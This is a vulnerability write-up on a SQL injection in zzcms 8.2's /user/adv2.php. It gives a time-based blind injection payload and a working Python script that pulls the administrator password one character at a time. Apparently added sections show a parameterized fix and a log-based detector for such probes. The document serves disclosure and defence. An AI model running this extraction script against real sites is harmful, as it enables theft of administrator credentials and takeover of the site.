/user/adv2.php

Edition: zzcms 8.2

Location: /user/adv2.php

Code (line 72):

```php
$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");
```

Harm: the administrator password can be retrieved through SQL injection.

Cause:
Look at the logic around the bug. Tracing back slowly, reaching this point requires that a and c are not both 0. In other words, the user must have a row in zzcms_main or zzcms_zh; otherwise the page simply tells the user that they do not have permission. With that in place, POST directly.

Going back further, the request must also set action=modify.

At this point, debug it directly in phpstorm with id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), and the delay is really there.
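The root cause is that the raw POST `id` is concatenated into the SQL text, so the value can change the query's structure. The following is an added illustration, not zzcms code: it rebuilds the vulnerable lookup and a hardened one over a constructed in-memory SQLite table (the column names and the `0 or 1=1` payload are assumptions for the demonstration, not taken from zzcms). The hardened version applies both fixes a reviewer would ask for here: enforce the integer type the column has before the value reaches SQL, and bind the value as a query parameter.

```python
import re
import sqlite3


def build_db():
    # Constructed stand-in for the zzcms_ad table (column names are an assumption).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zzcms_ad (id INTEGER PRIMARY KEY, title TEXT, userid TEXT)")
    conn.executemany(
        "INSERT INTO zzcms_ad VALUES (?, ?, ?)",
        [(1, "banner-1", "test2"), (2, "banner-2", "other"), (3, "banner-3", "other")],
    )
    return conn


def vulnerable_lookup(conn, user_id):
    # Mirrors the vulnerable PHP line: the untrusted value becomes part of the SQL text,
    # so a crafted value rewrites the WHERE clause instead of being compared against id.
    sql = "select * from zzcms_ad where id=" + user_id
    return conn.execute(sql).fetchall()


# id is an integer column; accept nothing but ASCII digits (re, not str.isdigit, so that
# Unicode digit characters are rejected as well).
INTEGER_ID = re.compile(r"^[0-9]+$")


def is_valid_id(user_id):
    return bool(INTEGER_ID.match(user_id))


def hardened_lookup(conn, user_id):
    # Fix 1: validate the type before the value is used anywhere.
    if not is_valid_id(user_id):
        raise ValueError("id must be a non-negative integer")
    # Fix 2: bind the value as a parameter; it can never alter the query structure.
    return conn.execute("select * from zzcms_ad where id=?", (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "0 or 1=1"  # constructed payload: turns the row lookup into "all rows"
    print("vulnerable, id=1        ->", vulnerable_lookup(db, "1"))
    print("vulnerable, id=payload  ->", vulnerable_lookup(db, payload))
    print("hardened,   id=1        ->", hardened_lookup(db, "1"))
    try:
        hardened_lookup(db, payload)
    except ValueError as exc:
        print("hardened,   id=payload  -> rejected:", exc)
```

Parameter binding alone already prevents the injection (the bound value is compared as a literal and matches no integer id); the explicit integer check is kept so that malformed input is rejected with a clear error before any database call, which is also the point at which a log entry or rate limit for the source can be raised.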
poc

```python
import requests

s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
cookies = {
    'UserName': 'test2'
}
flag = ''
# extract the password one character at a time, position i, candidate byte j
for i in range(1, 40):
    for j in range(33, 125):
        data = {
            'id': '0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i, j)
        }
        r = s.post(url, data=data, cookies=cookies)
        sec = r.elapsed.seconds
        # a delayed response means the guess for this position was right
        if sec > 2:
            flag += chr(j)
            print(flag)
            break
print(flag)
```

Get the administrator password.
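From the defender's side, the extraction above leaves a very recognisable trace: many POSTs to adv2.php from one source, each with a non-numeric `id`, a time-delay function in the value, and a response time that alternates between fast and roughly the chosen sleep interval. The following is an added detection sketch, not part of the original write-up: it runs over a constructed sample of application log records (the record layout, with the `id` value and response time in milliseconds, is an assumption; zzcms itself is not known to log this) and reports sources that repeatedly trip these checks.

```python
import re
from collections import Counter

# Constructed sample records; the layout is an assumption for this example.
SAMPLE_LOG = [
    {"ip": "203.0.113.5", "path": "/user/adv2.php", "id": "17", "ms": 40},
    {"ip": "203.0.113.9", "path": "/user/adv2.php",
     "id": "0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=49,sleep(3),0)", "ms": 38},
    {"ip": "203.0.113.9", "path": "/user/adv2.php",
     "id": "0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(3),0)", "ms": 3041},
    {"ip": "203.0.113.9", "path": "/user/adv2.php",
     "id": "0 or if((select ascii(substr(pass,2,1)) from zzcms_admin)=51,sleep(3),0)", "ms": 37},
    {"ip": "203.0.113.5", "path": "/user/adv2.php", "id": "18", "ms": 2900},  # slow but benign value
    {"ip": "203.0.113.7", "path": "/user/login.php", "id": "x", "ms": 12},   # different endpoint
]

INTEGER_ID = re.compile(r"^[0-9]+$")
DELAY_FUNC = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
SLOW_MS = 2500  # roughly the sleep interval a time-based probe would use


def classify(rec):
    """Return the list of reasons a single adv2.php request looks like probing."""
    reasons = []
    if not INTEGER_ID.match(rec["id"]):
        reasons.append("non-numeric id")
    if DELAY_FUNC.search(rec["id"]):
        reasons.append("time-delay function in id")
    if rec["ms"] >= SLOW_MS:
        reasons.append("slow response")
    return reasons


def suspicious_sources(records, path="/user/adv2.php", min_hits=2):
    """Count per-source requests that carry a malformed id; a single slow but
    well-formed request is not enough on its own."""
    hits = Counter()
    for rec in records:
        if rec["path"] != path:
            continue
        reasons = classify(rec)
        if "non-numeric id" in reasons:
            hits[rec["ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for rec in SAMPLE_LOG:
        print(rec["ip"], rec["path"], classify(rec))
    print("suspicious:", suspicious_sources(SAMPLE_LOG))
```

The slow-response signal is reported but not used for alerting on its own, because the legitimate request from 203.0.113.5 is slow too; what singles out the probing source is the repeated non-numeric `id` on an endpoint whose `id` can only ever be an integer.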